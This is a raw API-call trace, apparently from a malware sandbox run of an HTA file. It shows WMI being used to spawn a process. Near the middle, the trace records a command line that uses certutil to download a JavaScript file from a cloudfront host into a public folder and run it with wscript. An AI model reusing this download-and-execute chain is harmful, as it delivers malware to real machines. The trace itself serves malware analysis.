[0040.340] DispGetIDsOfNames (in: ptinfo=0xb8a8ce82c8, rgszNames=0xb8a8a2df70*="ShowWindow", cNames=0x1, rgdispid=0xb8a8a2e050 | out: rgdispid=0xb8a8a2e050*=-1) returned 0x80020006
[0040.351] IUnknown:AddRef (This=0xb8a8cf9880) returned 0x3
[0040.351] IWbemClassObject:Get (in: This=0xb8a8cf9880, wszName="ShowWindow", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0xb8a8a2de48*=0 | out: pVal=0x0, pType=0x0, plFlavor=0xb8a8a2de48*=32) returned 0x0
[0040.351] IUnknown:Release (This=0xb8a8cf9880) returned 0x2
[0040.351] SysStringLen (param_1="ShowWindow") returned 0xa
[0040.351] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce02a0
[0040.351] SysStringLen (param_1="ShowWindow") returned 0xa
[0040.351] IUnknown:Release (This=0xb8a8ce82c8) returned 0x2
[0040.351] IUnknown:AddRef (This=0xb8a8ce82c8) returned 0x3
[0040.351] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.351] GetCurrentThreadId () returned 0x210
[0040.351] SysStringLen (param_1="ShowWindow") returned 0xa
[0040.351] IWbemClassObject:Get (in: This=0xb8a8cf9880, wszName="ShowWindow", lFlags=0, pVal=0xb8a8a2dc40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xb8a8a2dcc0*=-1462805584, plFlavor=0x0 | out: pVal=0xb8a8a2dc40*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xb8a8a2dcc0*=18, plFlavor=0x0) returned 0x0
[0040.351] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.351] GetCurrentThreadId () returned 0x210
[0040.351] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6d950
[0040.351] IUnknown:AddRef (This=0xb8a8cf9880) returned 0x3
[0040.351] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cfeef0
[0040.352] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.352] GetCurrentThreadId () returned 0x210
[0040.352] IWbemClassObject:Get (in: This=0xb8a8cf9880, wszName="ShowWindow", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0xb8a8a2dbe8*=0 | out: pVal=0x0, pType=0x0, plFlavor=0xb8a8a2dbe8*=32) returned 0x0
[0040.352] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8d02910
[0040.352] IUnknown:AddRef (This=0xb8a8cf9880) returned 0x4
[0040.352] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cfef10
[0040.352] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0xb8a8a2db78*=0x0 | out: pptlib=0xb8a8a2db78*=0xb8a8ce7170) returned 0x0
[0040.352] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0xb8a8d02970*(Data1=0x1a388f98, Data2=0xd4ba, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x9, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0xb8a8d02958 | out: ppTInfo=0xb8a8d02958*=0xb8a8ce8378) returned 0x0
[0040.353] IUnknown:Release (This=0xb8a8ce7170) returned 0x7
[0040.353] IUnknown:AddRef (This=0xb8a8ce8378) returned 0x2
[0040.353] ITypeInfo:LocalInvoke (This=0xb8a8ce8378) returned 0x0
[0040.353] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.353] GetCurrentThreadId () returned 0x210
[0040.353] IWbemClassObject:Get (in: This=0xb8a8cf9880, wszName="ShowWindow", lFlags=0, pVal=0x0, pType=0xb8a8a2d6d0*=0, plFlavor=0x0 | out: pVal=0x0, pType=0xb8a8a2d6d0*=18, plFlavor=0x0) returned 0x0
[0040.353] IWbemClassObject:Put (This=0xb8a8cf9880, wszName="ShowWindow", lFlags=0, pVal=0xb8a8a2d678*(varType=0x3, wReserved1=0x0, wReserved2=0xb8, wReserved3=0x0, varVal1=0xb80000000c, varVal2=0x0), Type=18) returned 0x0
[0040.353] IUnknown:Release (This=0xb8a8ce8378) returned 0x1
[0040.353] IUnknown:Release (This=0xb8a8cf9880) returned 0x3
[0040.353] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.353] IUnknown:Release (This=0xb8a8ce8378) returned 0x0
[0040.353] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.353] IWbemClassObject:EndEnumeration (This=0xb8a8cf9880) returned 0x0
[0040.353] IUnknown:Release (This=0xb8a8cf9880) returned 0x2
[0040.353] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.353] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.353] IUnknown:Release (This=0xb8a8ce82c8) returned 0x2
[0040.353] IUnknown:AddRef (This=0xb8a8ce80b8) returned 0x2
[0040.353] DispGetIDsOfNames (in: ptinfo=0xb8a8ce80b8, rgszNames=0xb8a8a2dfd0*="Get", cNames=0x1, rgdispid=0xb8a8a2e1c4 | out: rgdispid=0xb8a8a2e1c4*=1) returned 0x0
[0040.353] IUnknown:Release (This=0xb8a8ce80b8) returned 0x1
[0040.353] IUnknown:AddRef (This=0xb8a8ce80b8) returned 0x2
[0040.354] ITypeInfo:LocalInvoke (This=0xb8a8ce80b8) returned 0x0
[0040.354] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.354] GetCurrentThreadId () returned 0x210
[0040.354] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x5
[0040.354] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.354] GetCurrentThreadId () returned 0x210
[0040.354] IWbemServices:GetObject (in: This=0xb8a8c61c60, strObjectPath="Win32_Process", lFlags=0, pCtx=0x0, ppObject=0xb8a8a2d478*=0x0, ppCallResult=0x0 | out: ppObject=0xb8a8a2d478*=0xb8a8d07ef0, ppCallResult=0x0) returned 0x0
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c782b0
[0040.362] IUnknown:AddRef (This=0xb8a8d07ef0) returned 0x2
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce15e0
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c6d950
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8d025f0
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0360
[0040.362] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x6
[0040.362] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8cf5b10
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce03e0
[0040.362] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce0820
[0040.362] IUnknown:AddRef (This=0xb8a8d07ef0) returned 0x3
[0040.362] IUnknown:Release (This=0xb8a8d07ef0) returned 0x2
[0040.362] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0xb8a8a2d408 | out: pperrinfo=0xb8a8a2d408*=0x0) returned 0x1
[0040.363] IUnknown:Release (This=0xb8a8c61c60) returned 0x5
[0040.363] IUnknown:Release (This=0xb8a8ce80b8) returned 0x1
[0040.363] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] IsCharSpaceW (wch=0x50) returned 0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] IsCharSpaceW (wch=0x50) returned 0
[0040.363] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] IsCharSpaceW (wch=0x69) returned 0
[0040.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.363] IsCharSpaceW (wch=0x69) returned 0
[0040.363] LoadRegTypeLib (in: rguid=0x7ffb2537d600*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xb8a8a2df30*=0x0 | out: pptlib=0xb8a8a2df30*=0xb8a8ce7170) returned 0x0
[0040.364] ITypeLib:GetTypeInfoOfGuid (in: This=0xb8a8ce7170, GUID=0x7ffb2537d440*(Data1=0x269ad56a, Data2=0x8a67, Data3=0x4129, Data4=([0]=0xbc, [1]=0x8c, [2]=0x5, [3]=0x6, [4]=0xdc, [5]=0xfe, [6]=0x98, [7]=0x80)), ppTInfo=0xb8a8cf5b40 | out: ppTInfo=0xb8a8cf5b40*=0xb8a8ce82c8) returned 0x0
[0040.364] IUnknown:Release (This=0xb8a8ce7170) returned 0x6
[0040.364] IUnknown:AddRef (This=0xb8a8ce82c8) returned 0x4
[0040.364] DispGetIDsOfNames (in: ptinfo=0xb8a8ce82c8, rgszNames=0xb8a8a2dfd0*="Create", cNames=0x1, rgdispid=0xb8a8a2e1c4 | out: rgdispid=0xb8a8a2e1c4*=-1) returned 0x80020006
[0040.364] IUnknown:AddRef (This=0xb8a8d07ef0) returned 0x3
[0040.364] IWbemClassObject:Get (in: This=0xb8a8d07ef0, wszName="Create", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0xb8a8a2dea8*=0 | out: pVal=0x0, pType=0x0, plFlavor=0xb8a8a2dea8*=0) returned 0x80041002
[0040.364] IUnknown:Release (This=0xb8a8d07ef0) returned 0x2
[0040.364] IWbemClassObject:Get (in: This=0xb8a8d07ef0, wszName="__GENUS", lFlags=0, pVal=0xb8a8a2de00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb8a8a2de00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0040.364] IUnknown:AddRef (This=0xb8a8d07ef0) returned 0x3
[0040.364] IUnknown:AddRef (This=0xb8a8d07ef0) returned 0x4
[0040.364] IWbemClassObject:GetMethod (in: This=0xb8a8d07ef0, wszName="Create", lFlags=0, ppInSignature=0xb8a8a2ded0, ppOutSignature=0xb8a8a2dec8 | out: ppInSignature=0xb8a8a2ded0*=0xb8a8d08910, ppOutSignature=0xb8a8a2dec8*=0xb8a8d090e0) returned 0x0
[0040.364] IWbemClassObject:GetNames (in: This=0xb8a8d08910, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0xb8a8a2dee0 | out: pNames=0xb8a8a2dee0*="\x01ƀ\x08") returned 0x0
[0040.365] IWbemClassObject:GetNames (in: This=0xb8a8d090e0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0xb8a8a2dec0 | out: pNames=0xb8a8a2dec0*="\x01ƀ\x08") returned 0x0
[0040.365] IUnknown:Release (This=0xb8a8d07ef0) returned 0x3
[0040.365] SysStringLen (param_1="Create") returned 0x6
[0040.365] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8d098e0
[0040.365] SysStringLen (param_1="Create") returned 0x6
[0040.365] IUnknown:Release (This=0xb8a8d090e0) returned 0x0
[0040.365] IUnknown:Release (This=0xb8a8d08910) returned 0x0
[0040.365] IUnknown:Release (This=0xb8a8ce82c8) returned 0x3
[0040.365] IUnknown:AddRef (This=0xb8a8ce82c8) returned 0x4
[0040.365] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.365] GetCurrentThreadId () returned 0x210
[0040.365] SysStringLen (param_1="Create") returned 0x6
[0040.365] IWbemClassObject:GetMethod (in: This=0xb8a8d07ef0, wszName="Create", lFlags=0, ppInSignature=0xb8a8a2dc88, ppOutSignature=0xb8a8a2dc78 | out: ppInSignature=0xb8a8a2dc88*=0xb8a8d08910, ppOutSignature=0xb8a8a2dc78*=0xb8a8d090e0) returned 0x0
[0040.365] IWbemClassObject:SpawnInstance (in: This=0xb8a8d08910, lFlags=0, ppNewInstance=0xb8a8a2dc70 | out: ppNewInstance=0xb8a8a2dc70*=0xb8a8d0a460) returned 0x0
[0040.365] IWbemClassObject:BeginEnumeration (This=0xb8a8d08910, lEnumFlags=64) returned 0x0
[0040.365] IWbemClassObject:Next (in: This=0xb8a8d08910, lFlags=0, strName=0xb8a8a2dc48*=0x0, pVal=0x0, pType=0xb8a8a2dc40*=762789792, plFlavor=0x0 | out: strName=0xb8a8a2dc48*="CommandLine", pVal=0x0, pType=0xb8a8a2dc40*=8, plFlavor=0x0) returned 0x0
[0040.365] IWbemClassObject:GetPropertyQualifierSet (in: This=0xb8a8d08910, wszProperty="CommandLine", ppQualSet=0xb8a8a2dbb0 | out: ppQualSet=0xb8a8a2dbb0*=0xb8a8c78bb0) returned 0x0
[0040.366] IWbemQualifierSet:Get (in: This=0xb8a8c78bb0, wszName="id", lFlags=0, pVal=0xb8a8a2dbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xb8a8a2dbd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x0
[0040.366] IWbemClassObject:Put (This=0xb8a8d0a460, wszName="CommandLine", lFlags=0, pVal=0xb8a8a2dbb8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js && wscript.exe C:\\Users\\Public\\en-US.js", varVal2=0x0), Type=0) returned 0x0
[0040.366] IUnknown:Release (This=0xb8a8c78bb0) returned 0x0
[0040.366] IWbemClassObject:Next (in: This=0xb8a8d08910, lFlags=0, strName=0xb8a8a2dc48*=0x0, pVal=0x0, pType=0xb8a8a2dc40*=8, plFlavor=0x0 | out: strName=0xb8a8a2dc48*="CurrentDirectory", pVal=0x0, pType=0xb8a8a2dc40*=8, plFlavor=0x0) returned 0x0
[0040.366] IWbemClassObject:GetPropertyQualifierSet (in: This=0xb8a8d08910, wszProperty="CurrentDirectory", ppQualSet=0xb8a8a2dbb0 | out: ppQualSet=0xb8a8a2dbb0*=0xb8a8c784b0) returned 0x0
[0040.366] IWbemQualifierSet:Get (in: This=0xb8a8c784b0, wszName="id", lFlags=0, pVal=0xb8a8a2dbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xb8a8a2dbd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), plFlavor=0x0) returned 0x0
[0040.366] IWbemClassObject:Put (This=0xb8a8d0a460, wszName="CurrentDirectory", lFlags=0, pVal=0xb8a8a2dbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), Type=0) returned 0x0
[0040.366] IUnknown:Release (This=0xb8a8c784b0) returned 0x0
[0040.366] IWbemClassObject:Next (in: This=0xb8a8d08910, lFlags=0, strName=0xb8a8a2dc48*=0x0, pVal=0x0, pType=0xb8a8a2dc40*=8, plFlavor=0x0 | out: strName=0xb8a8a2dc48*="ProcessStartupInformation", pVal=0x0, pType=0xb8a8a2dc40*=13, plFlavor=0x0) returned 0x0
[0040.366] IWbemClassObject:GetPropertyQualifierSet (in: This=0xb8a8d08910, wszProperty="ProcessStartupInformation", ppQualSet=0xb8a8a2dbb0 | out: ppQualSet=0xb8a8a2dbb0*=0xb8a8c783b0) returned 0x0
[0040.366] IWbemQualifierSet:Get (in: This=0xb8a8c783b0, wszName="id", lFlags=0, pVal=0xb8a8a2dbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xb8a8a2dbd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), plFlavor=0x0) returned 0x0
[0040.366] IUnknown:AddRef (This=0xb8a8cf9880) returned 0x3
[0040.366] IWbemClassObject:Put (This=0xb8a8d0a460, wszName="ProcessStartupInformation", lFlags=0, pVal=0xb8a8a2dbb8*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb8a8cf9880, varVal2=0x0), Type=0) returned 0x0
[0040.366] IUnknown:Release (This=0xb8a8c783b0) returned 0x0
[0040.366] IWbemClassObject:Next (in: This=0xb8a8d08910, lFlags=0, strName=0xb8a8a2dc48*=0x0, pVal=0x0, pType=0xb8a8a2dc40*=13, plFlavor=0x0 | out: strName=0xb8a8a2dc48*=0x0, pVal=0x0, pType=0xb8a8a2dc40*=13, plFlavor=0x0) returned 0x40005
[0040.366] IUnknown:AddRef (This=0xb8a8c61c60) returned 0x6
[0040.366] IWbemClassObject:Get (in: This=0xb8a8d07ef0, wszName="__RELPATH", lFlags=0, pVal=0xb8a8a2dca8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb8a8a2dca8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Process", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0040.366] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0040.366] GetCurrentThreadId () returned 0x210
[0040.367] IWbemServices:ExecMethod (in: This=0xb8a8c61c60, strObjectPath="Win32_Process", strMethodName="Create", lFlags=0, pCtx=0x0, pInParams=0xb8a8d0a460, ppOutParams=0xb8a8a2dc80*=0x0, ppCallResult=0x0 | out: ppOutParams=0xb8a8a2dc80*=0xb8a8d0bf00, ppCallResult=0x0) returned 0x0
[0040.626] IWbemClassObject:BeginEnumeration (This=0xb8a8d090e0, lEnumFlags=64) returned 0x0
[0040.626] IWbemClassObject:Next (in: This=0xb8a8d090e0, lFlags=0, strName=0xb8a8a2dc40*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0xb8a8a2dc40*="ProcessId", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0
[0040.626] IWbemClassObject:Get (in: This=0xb8a8d0bf00, wszName="ProcessId", lFlags=0, pVal=0xb8a8a2dba8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb8a8a2dba8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc40, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0040.627] _wcsicmp (_String1="ProcessId", _String2="ReturnValue") returned -2
[0040.627] IWbemClassObject:GetPropertyQualifierSet (in: This=0xb8a8d090e0, wszProperty="ProcessId", ppQualSet=0xb8a8a2dba0 | out: ppQualSet=0xb8a8a2dba0*=0xb8a8c78bb0) returned 0x0
[0040.627] IWbemQualifierSet:Get (in: This=0xb8a8c78bb0, wszName="id", lFlags=0, pVal=0xb8a8a2dbd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xb8a8a2dbd8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), plFlavor=0x0) returned 0x0
[0040.627] IUnknown:Release (This=0xb8a8c78bb0) returned 0x0
[0040.627] IWbemClassObject:Next (in: This=0xb8a8d090e0, lFlags=0, strName=0xb8a8a2dc40*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0xb8a8a2dc40*="ReturnValue", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0
[0040.627] IWbemClassObject:Get (in: This=0xb8a8d0bf00, wszName="ReturnValue", lFlags=0, pVal=0xb8a8a2dba8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xb8a8a2dba8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0040.627] _wcsicmp (_String1="ReturnValue", _String2="ReturnValue") returned 0
[0040.627] IWbemClassObject:Next (in: This=0xb8a8d090e0, lFlags=0, strName=0xb8a8a2dc40*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0xb8a8a2dc40*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x40005
[0040.627] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0xb8a8a2dc40 | out: pperrinfo=0xb8a8a2dc40*=0x0) returned 0x1
[0040.627] IUnknown:Release (This=0xb8a8d0bf00) returned 0x0
[0040.627] IUnknown:Release (This=0xb8a8c61c60) returned 0x5
[0040.627] IUnknown:Release (This=0xb8a8d0a460) returned 0x0
[0040.627] IUnknown:Release (This=0xb8a8d090e0) returned 0x0
[0040.627] IUnknown:Release (This=0xb8a8d08910) returned 0x0
[0040.627] IUnknown:Release (This=0xb8a8ce82c8) returned 0x3
[0040.627] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.627] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.627] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.627] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.627] IsCharSpaceW (wch=0x45) returned 0
[0040.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.628] IsCharSpaceW (wch=0x45) returned 0
[0040.628] _wcsicmp (_String1="window", _String2="window") returned 0
[0040.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0040.637] PostMessageW (hWnd=0x50226, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0040.637] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.637] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.637] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.637] IUnknown:Release (This=0xb8a8ce7f58) returned 0x0
[0040.637] WbemLocator:IUnknown:Release (This=0xb8a8ce6ee0) returned 0x0
[0040.637] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8c61c60) returned 0x4
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8ce8168) returned 0x0
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8ce80b8) returned 0x0
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8cf9510) returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8c61c60) returned 0x3
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8cf9510) returned 0x0
[0040.638] IUnknown:Release (This=0xb8a8ce82c8) returned 0x2
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8cf9880) returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8c61c60) returned 0x2
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8cf9880) returned 0x0
[0040.638] IUnknown:Release (This=0xb8a8ce82c8) returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.638] IUnknown:Release (This=0xb8a8d07ef0) returned 0x2
[0040.638] IUnknown:Release (This=0xb8a8c61c60) returned 0x1
[0040.639] IUnknown:Release (This=0xb8a8c61c60) returned 0x0
[0040.640] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.640] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.640] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.640] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.641] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.641] IUnknown:Release (This=0xb8a8d07ef0) returned 0x1
[0040.641] IUnknown:Release (This=0xb8a8d07ef0) returned 0x0
[0040.641] IUnknown:Release (This=0xb8a8ce82c8) returned 0x0
[0040.643] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.643] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.643] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.643] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.643] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0040.643] ISystemDebugEventFire:IsActive (This=0xb8a8c49390) returned 0x1
[0040.643] GetCursorPos (in: lpPoint=0xb8a8a2efb0 | out: lpPoint=0xb8a8a2efb0*(x=1287, y=746)) returned 1
[0040.643] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2efb0 | out: lpPoint=0xb8a8a2efb0) returned 1
[0040.643] GetKeyState (nVirtKey=16) returned 0
[0040.643] GetKeyState (nVirtKey=17) returned 0
[0040.643] GetKeyState (nVirtKey=18) returned 0
[0040.643] GetKeyState (nVirtKey=160) returned 0
[0040.644] GetKeyState (nVirtKey=162) returned 0
[0040.644] GetKeyState (nVirtKey=164) returned 0
[0040.644] GetCurrentThreadId () returned 0x210
[0040.644] GetCurrentThreadId () returned 0x210
[0040.644] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f270 | out: lpPerformanceCount=0xb8a8a2f270*=413164694) returned 1
[0040.644] IsWinEventHookInstalled (event=0x8000) returned 1
[0040.644] NotifyWinEvent (event=0x8000, hwnd=0x70064, idObject=0, idChild=0)
[0040.644] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned -5
